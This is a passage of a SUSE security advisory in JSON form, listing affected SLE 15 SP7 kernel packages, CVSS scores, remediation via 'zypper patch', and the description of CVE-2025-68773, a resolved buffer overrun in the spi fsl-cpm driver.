"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68771",
"url": "https://www.suse.com/security/cve/CVE-2025-68771"
},
{
"category": "external",
"summary": "SUSE Bug 1256582 for CVE-2025-68771",
"url": "https://bugzilla.suse.com/1256582"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68771"
},
{
"cve": "CVE-2025-68773",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68773"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: fsl-cpm: Check length parity before switching to 16 bit mode\n\nCommit fc96ec826bce (\"spi: fsl-cpm: Use 16 bit mode for large transfers\nwith even size\") failed to make sure that the size is really even\nbefore switching to 16 bit mode. Until recently the problem went\nunnoticed because kernfs uses a pre-allocated bounce buffer of size\nPAGE_SIZE for reading EEPROM.\n\nBut commit 8ad6249c51d0 (\"eeprom: at25: convert to spi-mem API\")\nintroduced an additional dynamically allocated bounce buffer whose size\nis exactly the size of the transfer, leading to a buffer overrun in\nthe fsl-cpm driver when that size is odd.\n\nAdd the missing length parity verification and remain in 8 bit mode\nwhen the length is not even.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68773",
"url": "https://www.suse.com/security/cve/CVE-2025-68773"
},
{
"category": "external",
"summary": "SUSE Bug 1256586 for CVE-2025-68773",
"url": "https://bugzilla.suse.com/1256586"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
